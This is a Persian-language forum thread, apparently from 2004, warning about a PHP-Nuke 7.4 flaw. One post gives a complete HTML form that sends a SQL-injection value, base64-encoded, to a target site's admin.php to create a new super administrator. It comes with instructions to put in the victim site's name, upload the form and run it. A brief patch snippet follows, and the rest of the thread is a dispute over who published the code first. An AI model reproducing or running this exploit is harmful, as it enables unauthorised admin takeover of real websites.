ايران ويج

ايران ويج > هك وكرك و ويروس > نفوذ و امنیت > هك > هشدار در مورد phpnuke7.4
نسخه‌ی کامل: هشدار در مورد phpnuke7.4
شما در حال مشاهده‌ی نسخه‌ی متنی این صفحه می‌باشید. مشاهده‌ی نسخه‌ی کامل با قالب بندی مناسب.
صفحه‌ها: 1 2

4shir

۱۷-شهریور-۱۳۸۳, ۱۵:۰۹:۵۷
سلام يك كد جالب اومده براي ناك كه تركونده توي سايت بخاطر امنيت سايت نميزارم اگر اشكان گفت ميزارم اشكان حواست باشه سايت پتچ شه :wink:

ashkan

۱۷-شهریور-۱۳۸۳, ۱۵:۴۴:۱۸
بزارش فوقش سايت رو ميتركونن(شوخي بزارش تا منم سريع ببينم چطور ميشه جلوش رو گرفت)

4shir

۱۷-شهریور-۱۳۸۳, ۱۶:۲۲:۳۷
خوب راه محافظتش كه تغير دادن نام پوشه ادمين هستش كد ها هم اينجا ميزارم
کد:
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body>
<form name="mantra" method="POST" action="http://www.target.com/admin.php">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<input type="hidden" name="add_radminsuper" value="1">
<input type="hidden" name="op" value="AddAuthor">
<p>USERNAME:
<input type="text" name="add_aid" size="20">
<br>
NAME:
<input type="text" name="add_name" size="20">
<br>
PASSWORD:
<input type="text" name="add_pwd" size="20">
<br>
E-MAIL:
<input type="text" name="add_email" size="20">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>

</body>

</html>
اينها رو بايد بزاريد توي يك صفحه هتمل بعد به جا target اسم سايت مورد نظر رو بدين و بعدش اپلود كنيد توي هاست و بعد هم اجراش كنيد

يك راه پتچ ديگه كه الان توي اشيانه ديدم اين هست
کد:
if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}

if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}
منبع هم اشيانه

ashkan

۱۷-شهریور-۱۳۸۳, ۱۶:۴۸:۳۶
اوه از زماني كه آقاساسان اينو اينجا زدي تعداد بازديدكننده ها شده 109 نفر 8O كه حتما 40 ٪ براي هك كردن سايت آومدن برم زود جلو پلاس سايت رو جمع كنم تا هك نشده. :cry:

ashkan

۱۷-شهریور-۱۳۸۳, ۱۶:۵۴:۱۹
اينم شاهد :
[تصویر: 109.JPG]

mehrad-a

۱۸-شهریور-۱۳۸۳, ۰۰:۲۵:۳۲
دوست عزيز شما بر خلاف Tos آشيانه عمل كرده و اطلاعات آشيانه را پخش كرده ايد.

amirjan

۱۸-شهریور-۱۳۸۳, ۰۱:۱۶:۵۴
mehrad-a نوشته است:دوست عزيز شما بر خلاف Tos آشيانه عمل كرده و اطلاعات آشيانه را پخش كرده ايد.
قضيه چيه ؟؟ :?: :?: TOS ؟؟؟؟ :?: :?:

4shir

۱۸-شهریور-۱۳۸۳, ۱۲:۲۱:۴۲
خوب اول اشكان
اشكان جان من كه گفتم اين رو نميزارم خودنت خواستي :o :wink: بعدش هم راه پتچ هم گفتم كه مشكلي برات پيش نياد اين از اين
دوم شما مهراد جان درست هستش كه اشيانه به اين صورت عمل ميكنه اما من اين مطلب رو از اونجا بر نداشتم :wink: بلكه پتچ رو از اونجا برداشتم اگر خواستيد بدونيد كي اين رو برداشته از اونجا و به نام خودش ثبت كرده به من بگيد تا بدم بهتون حتي Amaze بالاي فايل ميتونيد اين رو بخونيد copyright by laphasecurityteam گفتم ازكجا هم برداشتمAmaze عيب نداره در هر صورت اميدوارم كسي از اين مسيله سوء استفاده نكنه
موفق باشيد
ساسان

ashkan

۱۸-شهریور-۱۳۸۳, ۱۸:۵۷:۳۲
mehrad-a نوشته است:دوست عزيز شما بر خلاف Tos آشيانه عمل كرده و اطلاعات آشيانه را پخش كرده ايد.
خوب پس اين آشيانه اي ها هم اينجا هستن ، اوه پس يكم بايد مواظب بود ، قبلا كه هكشو با نابود كامل سايت ديگران همراه بود حالا نميدونم؟

saadatmandi

۱۸-شهریور-۱۳۸۳, ۲۱:۲۳:۴۶
اين كدهايي رو كه شما نوشتيد همش رو سايتي به نام http://www.mantralab.org انتشار داده.
بعضي دودره بازها هم به اسم خودشون مي زنن ..Amaze Amaze Amaze

amirjan

۱۸-شهریور-۱۳۸۳, ۲۳:۵۸:۲۹
اه راست ميگه ها !! اينجا هم هست ! :
ايناها --> http://www.mantralab.org/modules.php/mod...wAdmin+Bug
صفحه‌ها: 1 2
ايران ويج > هك وكرك و ويروس > نفوذ و امنیت > هك > هشدار در مورد phpnuke7.4